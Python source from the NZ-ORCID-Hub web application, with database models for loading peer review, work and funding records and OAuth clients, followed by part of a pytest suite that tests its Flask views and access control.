subject_name_title = peer_review_data.get("subject-name").get("title").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("title") else None
subject_name_subtitle = peer_review_data.get("subject-name").get("subtitle").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("subtitle") else None
subject_name_translated_title_lang_code = peer_review_data.get("subject-name").get(
"translated-title").get(
"language-code") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("translated-title") else None
subject_name_translated_title = peer_review_data.get("subject-name").get(
"translated-title").get(
"value") if peer_review_data.get(
"subject-name") and peer_review_data.get("subject-name").get("translated-title") else None
subject_url = peer_review_data.get("subject-url").get("value") if peer_review_data.get(
"subject-name") else None
convening_org_name = peer_review_data.get("convening-organization").get(
"name") if peer_review_data.get(
"convening-organization") else None
convening_org_city = peer_review_data.get("convening-organization").get("address").get(
"city") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_region = peer_review_data.get("convening-organization").get("address").get(
"region") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_country = peer_review_data.get("convening-organization").get("address").get(
"country") if peer_review_data.get("convening-organization") and peer_review_data.get(
"convening-organization").get("address") else None
convening_org_disambiguated_identifier = peer_review_data.get(
"convening-organization").get("disambiguated-organization").get(
"disambiguated-organization-identifier") if peer_review_data.get(
"convening-organization") and peer_review_data.get("convening-organization").get(
"disambiguated-organization") else None
convening_org_disambiguation_source = peer_review_data.get(
"convening-organization").get("disambiguated-organization").get(
"disambiguation-source") if peer_review_data.get(
"convening-organization") and peer_review_data.get("convening-organization").get(
"disambiguated-organization") else None
peer_review_record = PeerReviewRecord.create(
task=task,
review_group_id=review_group_id,
reviewer_role=reviewer_role,
review_url=review_url,
review_type=review_type,
review_completion_date=review_completion_date,
subject_external_id_type=subject_external_id_type,
subject_external_id_value=subject_external_id_value,
subject_external_id_url=subject_external_id_url,
subject_external_id_relationship=subject_external_id_relationship,
subject_container_name=subject_container_name,
subject_type=subject_type,
subject_name_title=subject_name_title,
subject_name_subtitle=subject_name_subtitle,
subject_name_translated_title_lang_code=subject_name_translated_title_lang_code,
subject_name_translated_title=subject_name_translated_title,
subject_url=subject_url,
convening_org_name=convening_org_name,
convening_org_city=convening_org_city,
convening_org_region=convening_org_region,
convening_org_country=convening_org_country,
convening_org_disambiguated_identifier=convening_org_disambiguated_identifier,
convening_org_disambiguation_source=convening_org_disambiguation_source)
invitees_list = peer_review_data.get("invitees") if peer_review_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier") if invitee.get("identifier") else None
email = invitee.get("email") if invitee.get("email") else None
first_name = invitee.get("first-name") if invitee.get("first-name") else None
last_name = invitee.get("last-name") if invitee.get("last-name") else None
orcid_id = invitee.get("ORCID-iD") if invitee.get("ORCID-iD") else None
put_code = invitee.get("put-code") if invitee.get("put-code") else None
visibility = get_val(invitee, "visibility")
PeerReviewInvitee.create(
peer_review_record=peer_review_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the peer review record will be written")
external_ids_list = peer_review_data.get("review-identifiers").get("external-id") if \
peer_review_data.get("review-identifiers") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = external_id.get("external-id-url").get("value") if \
external_id.get("external-id-url") else None
relationship = external_id.get("external-id-relationship")
PeerReviewExternalId.create(
peer_review_record=peer_review_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load peer review file.")
raise
class Meta: # noqa: D101,D106
db_table = "peer_review_record"
table_alias = "pr"
class WorkRecord(RecordModel):
"""Work record loaded from Json file for batch processing."""
task = ForeignKeyField(Task, related_name="work_records", on_delete="CASCADE")
title = CharField(max_length=255)
sub_title = CharField(null=True, max_length=255)
translated_title = CharField(null=True, max_length=255)
translated_title_language_code = CharField(null=True, max_length=10)
journal_title = CharField(null=True, max_length=255)
short_description = CharField(null=True, max_length=4000)
citation_type = CharField(max_length=255)
citation_value = CharField(max_length=255)
type = CharField(null=True, max_length=255)
publication_date = PartialDateField(null=True)
publication_media_type = CharField(null=True, max_length=255)
url = CharField(null=True, max_length=255)
language_code = CharField(null=True, max_length=10)
country = CharField(null=True, max_length=255)
is_active = BooleanField(
default=False, help_text="The record is marked for batch processing", null=True)
processed_at = DateTimeField(null=True)
status = TextField(null=True, help_text="Record processing status.")
@classmethod
def load_from_json(cls, source, filename=None, org=None):
"""Load data from JSON file or a string."""
if isinstance(source, str):
# import data from file based on its extension; either it is yaml or json
work_data_list = load_yaml_json(filename=filename, source=source)
# TODO: validation of uploaded work file
for work_data in work_data_list:
validation_source_data = copy.deepcopy(work_data)
validation_source_data = del_none(validation_source_data)
# Adding schema valdation for Work
validator = Core(
source_data=validation_source_data, schema_files=["work_schema.yaml"])
validator.validate(raise_exception=True)
try:
if org is None:
org = current_user.organisation if current_user else None
task = Task.create(org=org, filename=filename, task_type=TaskType.WORK)
for work_data in work_data_list:
title = get_val(work_data, "title", "title", "value")
sub_title = get_val(work_data, "title", "subtitle", "value")
translated_title = get_val(work_data, "title", "translated-title", "value")
translated_title_language_code = get_val(work_data, "title", "translated-title", "language-code")
journal_title = get_val(work_data, "journal-title", "value")
short_description = get_val(work_data, "short-description")
citation_type = get_val(work_data, "citation", "citation-type")
citation_value = get_val(work_data, "citation", "citation-value")
type = get_val(work_data, "type")
publication_media_type = get_val(work_data, "publication-date", "media-type")
url = get_val(work_data, "url", "value")
language_code = get_val(work_data, "language-code")
country = get_val(work_data, "country", "value")
# Removing key 'media-type' from the publication_date dict. and only considering year, day & month
publication_date = PartialDate.create(
{date_key: work_data.get("publication-date")[date_key] for date_key in
('day', 'month', 'year')}) if work_data.get("publication-date") else None
work_record = WorkRecord.create(
task=task,
title=title,
sub_title=sub_title,
translated_title=translated_title,
translated_title_language_code=translated_title_language_code,
journal_title=journal_title,
short_description=short_description,
citation_type=citation_type,
citation_value=citation_value,
type=type,
publication_date=publication_date,
publication_media_type=publication_media_type,
url=url,
language_code=language_code,
country=country)
invitees_list = work_data.get("invitees") if work_data.get("invitees") else None
if invitees_list:
for invitee in invitees_list:
identifier = invitee.get("identifier")
email = invitee.get("email")
first_name = invitee.get("first-name")
last_name = invitee.get("last-name")
orcid_id = invitee.get("ORCID-iD")
put_code = invitee.get("put-code")
visibility = get_val(invitee, "visibility")
WorkInvitees.create(
work_record=work_record,
identifier=identifier,
email=email.lower(),
first_name=first_name,
last_name=last_name,
orcid=orcid_id,
visibility=visibility,
put_code=put_code)
else:
raise SchemaError(u"Schema validation failed:\n - "
u"Expecting Invitees for which the work record will be written")
contributors_list = work_data.get("contributors").get("contributor") if \
work_data.get("contributors") else None
if contributors_list:
for contributor in contributors_list:
orcid_id = get_val(contributor, "contributor-orcid", "path")
name = get_val(contributor, "credit-name", "value")
email = get_val(contributor, "contributor-email", "value")
role = get_val(contributor, "contributor-attributes", "contributor-role")
contributor_sequence = get_val(contributor, "contributor-attributes",
"contributor-sequence")
WorkContributor.create(
work_record=work_record,
orcid=orcid_id,
name=name,
email=email,
role=role,
contributor_sequence=contributor_sequence)
external_ids_list = work_data.get("external-ids").get("external-id") if \
work_data.get("external-ids") else None
if external_ids_list:
for external_id in external_ids_list:
type = external_id.get("external-id-type")
value = external_id.get("external-id-value")
url = get_val(external_id, "external-id-url", "value")
relationship = external_id.get("external-id-relationship")
WorkExternalId.create(
work_record=work_record,
type=type,
value=value,
url=url,
relationship=relationship)
else:
raise SchemaError(u"Schema validation failed:\n - An external identifier is required")
return task
except Exception:
db.rollback()
app.logger.exception("Failed to load work record file.")
raise
class Meta: # noqa: D101,D106
db_table = "work_record"
table_alias = "wr"
class ContributorModel(BaseModel):
"""Common model bits of the contributor records."""
orcid = OrcidIdField(null=True)
name = CharField(max_length=120, null=True)
role = CharField(max_length=120, null=True)
email = CharField(max_length=120, null=True)
class WorkContributor(ContributorModel):
"""Researcher or contributor - related to work."""
work_record = ForeignKeyField(
WorkRecord, related_name="work_contributors", on_delete="CASCADE")
contributor_sequence = CharField(max_length=120, null=True)
class Meta: # noqa: D101,D106
db_table = "work_contributor"
table_alias = "wc"
class FundingContributor(ContributorModel):
"""Researcher or contributor - reciever of the funding."""
funding_record = ForeignKeyField(
FundingRecord, related_name="contributors", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "funding_contributor"
table_alias = "fc"
class InviteesModel(BaseModel):
"""Common model bits of the invitees records."""
identifier = CharField(max_length=120, null=True)
email = CharField(max_length=120, null=True)
first_name = CharField(max_length=120, null=True)
last_name = CharField(max_length=120, null=True)
orcid = OrcidIdField(null=True)
put_code = IntegerField(null=True)
visibility = CharField(null=True, max_length=100)
status = TextField(null=True, help_text="Record processing status.")
processed_at = DateTimeField(null=True)
def add_status_line(self, line):
"""Add a text line to the status for logging processing progress."""
ts = datetime.utcnow().isoformat(timespec="seconds")
self.status = (self.status + "\n" if self.status else '') + ts + ": " + line
class PeerReviewInvitee(InviteesModel):
"""Researcher or Invitee - related to peer review."""
peer_review_record = ForeignKeyField(
PeerReviewRecord, related_name="peer_review_invitee", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "peer_review_invitee"
table_alias = "pi"
class WorkInvitees(InviteesModel):
"""Researcher or Invitees - related to work."""
work_record = ForeignKeyField(
WorkRecord, related_name="work_invitees", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "work_invitees"
table_alias = "wi"
class FundingInvitees(InviteesModel):
"""Researcher or Invitees - related to funding."""
funding_record = ForeignKeyField(
FundingRecord, related_name="funding_invitees", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "funding_invitees"
table_alias = "fi"
class ExternalIdModel(BaseModel):
"""Common model bits of the ExternalId records."""
type = CharField(max_length=255)
value = CharField(max_length=255)
url = CharField(max_length=200, null=True)
relationship = CharField(max_length=255, null=True)
class WorkExternalId(ExternalIdModel):
"""Work ExternalId loaded for batch processing."""
work_record = ForeignKeyField(
WorkRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "work_external_id"
table_alias = "wei"
class PeerReviewExternalId(ExternalIdModel):
"""Peer Review ExternalId loaded for batch processing."""
peer_review_record = ForeignKeyField(
PeerReviewRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "peer_review_external_id"
table_alias = "pei"
class ExternalId(ExternalIdModel):
"""Funding ExternalId loaded for batch processing."""
funding_record = ForeignKeyField(
FundingRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "external_id"
table_alias = "ei"
class Url(BaseModel, AuditMixin):
"""Shortened URLs."""
short_id = CharField(unique=True, max_length=5)
url = TextField()
@classmethod
def shorten(cls, url):
"""Create a shorten url or retrievs an exiting one."""
try:
u = cls.get(url=url)
except cls.DoesNotExist:
while True:
short_id = ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(5))
try:
cls.get(short_id=short_id)
except cls.DoesNotExist:
u = cls.create(short_id=short_id, url=url)
return u
return u
class Funding(BaseModel):
"""Uploaded research Funding record."""
short_id = CharField(unique=True, max_length=5)
url = TextField()
class Client(BaseModel, AuditMixin):
"""API Client Application/Consumer.
A client is the app which wants to use the resource of a user.
It is suggested that the client is registered by a user on your site,
but it is not required.
"""
name = CharField(null=True, max_length=40, help_text="human readable name, not required")
homepage_url = CharField(null=True, max_length=100)
description = CharField(
null=True, max_length=400, help_text="human readable description, not required")
user = ForeignKeyField(
User, null=True, on_delete="SET NULL", help_text="creator of the client, not required")
org = ForeignKeyField(Organisation, on_delete="CASCADE", related_name="client_applications")
client_id = CharField(max_length=100, unique=True)
client_secret = CharField(max_length=55, unique=True)
is_confidential = BooleanField(null=True, help_text="public or confidential")
grant_type = CharField(max_length=18, default="client_credentials", null=True)
response_type = CharField(max_length=4, default="code", null=True)
_redirect_uris = TextField(null=True)
_default_scopes = TextField(null=True)
def save(self, *args, **kwargs): # noqa: D102
if self.is_dirty() and self.user_id is None and current_user:
self.user_id = current_user.id
return super().save(*args, **kwargs)
@property
def client_type(self): # noqa: D102
if self.is_confidential:
return 'confidential'
return 'public'
@property
def redirect_uris(self): # noqa: D102
if self._redirect_uris:
return self._redirect_uris.split()
return []
@redirect_uris.setter
def redirect_uris(self, value):
if value and isinstance(value, str):
self._redirect_uris = value
@property
def callback_urls(self): # noqa: D102
return self._redirect_uris
@callback_urls.setter
def callback_urls(self, value):
self._redirect_uris = value
@property
def default_redirect_uri(self): # noqa: D102
ru = self.redirect_uris
if not ru:
return None
return self.redirect_uris[0]
@property
def default_scopes(self): # noqa: D102
if self._default_scopes:
return self._default_scopes.split()
return []
def validate_scopes(self, scopes):
"""Validate client requested scopes."""
return "/webhook" in scopes or not scopes
def __repr__(self): # noqa: D102
return self.name or self.homepage_url or self.description
class Grant(BaseModel):
"""Grant Token / Authorization Code.
A grant token is created in the authorization flow, and will be destroyed when
the authorization is finished. In this case, it would be better to store the data
in a cache, which leads to better performance.
"""
user = ForeignKeyField(User, on_delete="CASCADE")
# client_id = db.Column(
# db.String(40), db.ForeignKey('client.client_id'),
# nullable=False,
# )
client = ForeignKeyField(Client, index=True)
code = CharField(max_length=255, index=True)
redirect_uri = CharField(max_length=255, null=True)
expires = DateTimeField(null=True)
_scopes = TextField(null=True)
# def delete(self):
# super().delete().execute()
# return self
@property
def scopes(self): # noqa: D102
if self._scopes:
return self._scopes.split()
return []
@scopes.setter
def scopes(self, value): # noqa: D102
if isinstance(value, str):
self._scopes = value
else:
self._scopes = ' '.join(value)
class Token(BaseModel):
"""Bearer Token.
A bearer token is the final token that could be used by the client.
There are other token types, but bearer token is widely used.
Flask-OAuthlib only comes with a bearer token.
"""
client = ForeignKeyField(Client)
user = ForeignKeyField(User, null=True, on_delete="SET NULL")
token_type = CharField(max_length=40)
access_token = CharField(max_length=100, unique=True)
refresh_token = CharField(max_length=100, unique=True, null=True)
expires = DateTimeField(null=True)
_scopes = TextField(null=True)
@property
def scopes(self): # noqa: D102
if self._scopes:
return self._scopes.split()
return []
@property
def expires_at(self): # noqa: D102
return self.expires
def readup_file(input_file):
"""Read up the whole content and deconde it and return the whole content."""
raw = input_file.read()
for encoding in "utf-8-sig", "utf-8", "utf-16":
try:
return raw.decode(encoding)
except UnicodeDecodeError:
continue
return raw.decode("latin-1")
def create_tables():
"""Create all DB tables."""
try:
db.connect()
except OperationalError:
pass
for model in [
File,
Organisation,
User,
UserOrg,
OrcidToken,
UserOrgAffiliation,
OrgInfo,
OrcidApiCall,
OrcidAuthorizeCall,
Task,
AffiliationRecord,
GroupIdRecord,
OrgInvitation,
Url,
UserInvitation,
FundingRecord,
WorkRecord,
WorkContributor,
WorkExternalId,
WorkInvitees,
FundingContributor,
FundingInvitees,
ExternalId,
PeerReviewRecord,
PeerReviewInvitee,
PeerReviewExternalId,
Client,
Grant,
Token,
]:
try:
model.create_table()
except (ProgrammingError, OperationalError) as ex:
if "already exists" in str(ex):
app.logger.info(f"Table '{model._meta.name}' already exists")
else:
raise ex
def create_audit_tables():
"""Create all DB audit tables for PostgreSQL DB."""
try:
db.connect()
except OperationalError:
pass
if isinstance(db, PostgresqlDatabase):
with open(os.path.join(os.path.dirname(__file__), "sql", "auditing.sql"), 'br') as input_file:
sql = readup_file(input_file)
db.commit()
with db.get_cursor() as cr:
cr.execute(sql)
db.commit()
def drop_tables():
"""Drop all model tables."""
for m in (Organisation, User, UserOrg, OrcidToken, UserOrgAffiliation, OrgInfo, OrgInvitation,
OrcidApiCall, OrcidAuthorizeCall, Task, AffiliationRecord, Url, UserInvitation):
if m.table_exists():
try:
m.drop_table(fail_silently=True, cascade=m._meta.database.drop_cascade)
except OperationalError:
pass
def load_yaml_json(filename, source):
"""Create a common way of loading json or yaml file."""
if os.path.splitext(filename)[1][1:] == "yaml" or os.path.splitext(
filename)[1][1:] == "yml":
data_list = yaml.load(source)
else:
data_list = json.loads(source)
# Removing None for correct schema validation
if not isinstance(data_list, list):
raise SchemaError(
u"Schema validation failed:\n - Expecting a list of Records")
return data_list
def del_none(d):
"""
Delete keys with the value ``None`` in a dictionary, recursively.
So that the schema validation will not fail, for elements that are none
"""
for key, value in list(d.items()):
if value is None:
del d[key]
elif isinstance(value, list):
for item in value:
if isinstance(item, dict):
del_none(item)
elif isinstance(value, dict):
del_none(value)
return d
def get_val(d, *keys, default=None):
"""To get the value from uploaded fields."""
for k in keys:
if not d:
break
d = d.get(k, default)
return d
```
#### File: NZ-ORCID-Hub/tests/test_views.py
```python
import datetime
import json
import logging
import os
import sys
import time
from itertools import product
from unittest.mock import MagicMock, patch
from io import BytesIO
import pytest
from flask import request, make_response
from flask_login import login_user
from peewee import SqliteDatabase
from playhouse.test_utils import test_database
from werkzeug.datastructures import ImmutableMultiDict
from orcid_hub import app, orcid_client, rq, views
from orcid_hub.config import ORCID_BASE_URL
from orcid_hub.forms import FileUploadForm
from orcid_hub.models import UserOrgAffiliation # noqa: E128
from orcid_hub.models import (Affiliation, AffiliationRecord, Client, File, FundingRecord,
OrcidToken, Organisation, OrgInfo, Role, Task, Token, Url, User,
UserInvitation, UserOrg, PeerReviewRecord, WorkRecord)
fake_time = time.time()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler())
@pytest.fixture
def test_db():
"""Test to check db."""
_db = SqliteDatabase(":memory:")
with test_database(
_db, (
Organisation,
User,
UserOrg,
OrcidToken,
UserOrgAffiliation,
Task,
AffiliationRecord,
),
fail_silently=True) as _test_db:
yield _test_db
return
@pytest.fixture
def test_models(test_db):
"""Test to check models."""
Organisation.insert_many((dict(
name="Organisation #%d" % i,
tuakiri_name="Organisation #%d" % i,
orcid_client_id="client-%d" % i,
orcid_secret="secret-%d" % i,
confirmed=(i % 2 == 0)) for i in range(10))).execute()
User.insert_many((dict(
name="Test User #%d" % i,
first_name="Test_%d" % i,
last_name="User_%d" % i,
email="<EMAIL>" % (i, i * 4 % 10),
confirmed=(i % 3 != 0),
roles=Role.SUPERUSER if i % 42 == 0 else Role.ADMIN if i % 13 == 0 else Role.RESEARCHER)
for i in range(60))).execute()
UserOrg.insert_many((dict(is_admin=((u + o) % 23 == 0), user=u, org=o)
for (u, o) in product(range(2, 60, 4), range(2, 10)))).execute()
UserOrg.insert_many((dict(is_admin=True, user=43, org=o) for o in range(1, 11))).execute()
OrcidToken.insert_many((dict(
user=User.get(id=1),
org=Organisation.get(id=1),
scope="/read-limited",
access_token="Test_%d" % i) for i in range(60))).execute()
UserOrgAffiliation.insert_many((dict(
user=User.get(id=1),
organisation=Organisation.get(id=1),
department_name="Test_%d" % i,
department_city="Test_%d" % i,
role_title="Test_%d" % i,
path="Test_%d" % i,
put_code="%d" % i) for i in range(30))).execute()
yield test_db
def test_superuser_view_access(request_ctx):
"""Test if SUPERUSER can access Flask-Admin"."""
with request_ctx("/admin/schedude/") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 403
assert b"403" in rv.data
user = User.create(
name="<NAME>",
email="<EMAIL>",
roles=Role.SUPERUSER,
username="test42",
confirmed=True)
with request_ctx("/admin/user/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"User" in rv.data
with request_ctx(f"/admin/user/edit/?id={user.id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"TEST USER" in rv.data
with request_ctx("/admin/schedude/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"interval" in rv.data
jobs = rq.get_scheduler().get_jobs()
with request_ctx(f"/admin/schedude/details/?id={jobs[0].id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"interval" in rv.data
def test_admin_view_access_fail(client, request_ctx):
"""Test if non SUPERUSER cannot access Flask-Admin"."""
rv = client.get("/admin/user/")
assert rv.status_code == 302
assert "next=" in rv.location and "admin" in rv.location
with request_ctx("/admin/user/") as ctx:
test_user = User(
name="<NAME>", email="<EMAIL>", username="test42", confirmed=True)
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert "next=" in rv.location and "admin" in rv.location
def test_access(request_ctx):
"""Test access to differente resources."""
test_superuser = User.create(
name="<NAME>",
email="<EMAIL>",
username="test42",
confirmed=True,
roles=Role.SUPERUSER)
test_user = User.create(
name="<NAME>",
email="<EMAIL>",
username="test123456789",
confirmed=True,
roles=Role.RESEARCHER)
with request_ctx("/pyinfo") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
with request_ctx("/rq") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 401
assert b"401" in rv.data
with request_ctx("/rq?next=http://orcidhub.org.nz/next") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location == "http://orcidhub.org.nz/next"
with request_ctx("/pyinfo") as ctx:
login_user(test_superuser, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert bytes(sys.version, encoding="utf-8") in rv.data
with request_ctx("/pyinfo") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
with request_ctx("/rq") as ctx:
login_user(test_superuser, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"Queues" in rv.data
with request_ctx("/rq") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 403
assert b"403" in rv.data
with request_ctx("/rq?next=http://orcidhub.org.nz/next") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location == "http://orcidhub.org.nz/next"
def test_year_range():
"""Test Jinja2 filter."""
assert views.year_range({"start_date": None, "end_date": None}) == "unknown-present"
assert views.year_range({
"start_date": {
"year": {
"value": "1998"
},
"whatever": "..."
},
"end_date": None
}) == "1998-present"
assert views.year_range({
"start_date": {
"year": {
"value": "1998"
},
"whatever": "..."
},
"end_date": {
"year": {
"value": "2001"
},
"whatever": "..."
}
}) == "1998-2001"
def test_user_orcid_id_url():
"""Test to get orcid url."""
u = User(
email="<EMAIL>",
name="<NAME>",
username="test123",
roles=Role.RESEARCHER,
orcid="123",
confirmed=True)
assert (views.user_orcid_id_url(u) == ORCID_BASE_URL + "123")
u.orcid = None
assert (views.user_orcid_id_url(u) == "")
def test_show_record_section(request_ctx):
"""Test to show selected record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
OrcidToken.create(user=user, org=user.organisation, access_token="ABC123")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_employments",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_employments, request_ctx(f"/section/{user.id}/EMP/list") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_employments.assert_called_once_with("XXXX-XXXX-XXXX-0001")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_educations",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_educations, request_ctx(f"/section/{user.id}/EDU/list") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_educations.assert_called_once_with("XXXX-XXXX-XXXX-0001")
def test_status(client):
"""Test status is workinkg both when DB is accessible or not."""
with patch("orcid_hub.views.db") as db: # , request_ctx("/status") as ctx:
result = MagicMock()
result.fetchone.return_value = (datetime.datetime(2042, 1, 1, 0, 0), )
db.execute_sql.return_value = result
rv = client.get("/status")
data = json.loads(rv.data)
assert rv.status_code == 200
assert data["status"] == "Connection successful."
assert data["db-timestamp"] == "2042-01-01T00:00:00"
with patch("orcid_hub.views.db") as db: # , request_ctx("/status") as ctx:
db.execute_sql.side_effect = Exception("FAILURE")
rv = client.get("/status")
data = json.loads(rv.data)
assert rv.status_code == 503
assert data["status"] == "Error"
assert "FAILURE" in data["message"]
def test_application_registration(app, request_ctx):
"""Test application registration."""
org = Organisation.create(
can_use_api=True,
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=True,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE")
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
org.update(tech_contact=user).execute()
with request_ctx(
"/settings/applications",
method="POST",
data={
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
}) as ctx: # noqa: F405
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
with pytest.raises(Client.DoesNotExist):
Client.get(name="TEST APP")
assert resp.status_code == 200
with request_ctx(
"/settings/applications",
method="POST",
data={
"name": "TEST APP",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
}) as ctx: # noqa: F405
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
c = Client.get(name="TEST APP")
assert c.homepage_url == "http://test.at.test"
assert c.description == "TEST APPLICATION 123"
assert c.user == user
assert c.org == org
assert c.client_id
assert c.client_secret
assert rv.status_code == 302
client = Client.get(name="TEST APP")
with request_ctx(f"/settings/applications/{client.id}") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/settings/credentials/{client.id}"
with request_ctx("/settings/credentials") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
with request_ctx(f"/settings/credentials/{client.id}") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
with request_ctx("/settings/credentials/99999999999999") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/settings/applications"
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"revoke": "Revoke",
"name": client.name,
}) as ctx:
login_user(user, remember=True)
Token.create(client=client, token_type="TEST", access_token="<PASSWORD>")
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert Token.select().where(Token.client == client).count() == 0
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"reset": "Reset",
"name": client.name,
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
client = Client.get(name="TEST APP")
assert resp.status_code == 200
assert client.client_id != old_client.client_id
assert client.client_secret != old_client.client_secret
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"update_app": "Update",
"name": "NEW APP NAME",
"homepage_url": "http://test.test0.edu",
"description": "DESCRIPTION",
"callback_urls": "http://test0.edu/callback",
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
client = Client.get(id=client.id)
assert resp.status_code == 200
assert client.name == "NEW APP NAME"
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"delete": "Delete",
"name": "NEW APP NAME",
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/settings/applications"
assert not Client.select().where(Client.id == client.id).exists()
def make_fake_response(text, *args, **kwargs):
"""Mock out the response object returned by requests_oauthlib.OAuth2Session.get(...)."""
mm = MagicMock(name="response")
mm.text = text
if "json" in kwargs:
mm.json.return_value = kwargs["json"]
else:
mm.json.return_value = json.loads(text)
if "status_code" in kwargs:
mm.status_code = kwargs["status_code"]
return mm
def test_short_url(request_ctx):
"""Test short url."""
short_url = Url.shorten("https://HOST/confirm/organisation/ABCD1234")
with request_ctx("/u/" + short_url.short_id) as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "https://HOST/confirm/organisation/ABCD1234"
with request_ctx("/u/" + short_url.short_id + "?param=PARAM123") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "https://HOST/confirm/organisation/ABCD1234?param=PARAM123"
with request_ctx("/u/DOES_NOT_EXIST") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
def test_load_org(request_ctx):
"""Test load organisation."""
root = User.get(email="<EMAIL>")
with request_ctx("/load/org") as ctx:
login_user(root, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<!DOCTYPE html>" in resp.data, "Expected HTML content"
def test_read_uploaded_file(request_ctx):
"""Test Uploading File."""
with request_ctx() as ctxx:
form = FileUploadForm()
form.file_.name = "conftest.py"
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'conftest.py'),
'rb') as f:
request.files = {'conftest.py': f}
ctxx = views.read_uploaded_file(form)
assert "@pytest.fixture" in ctxx
def test_user_orgs_org(request_ctx):
"""Test add an organisation to the user."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.SUPERUSER,
orcid="123",
confirmed=True,
organisation=org)
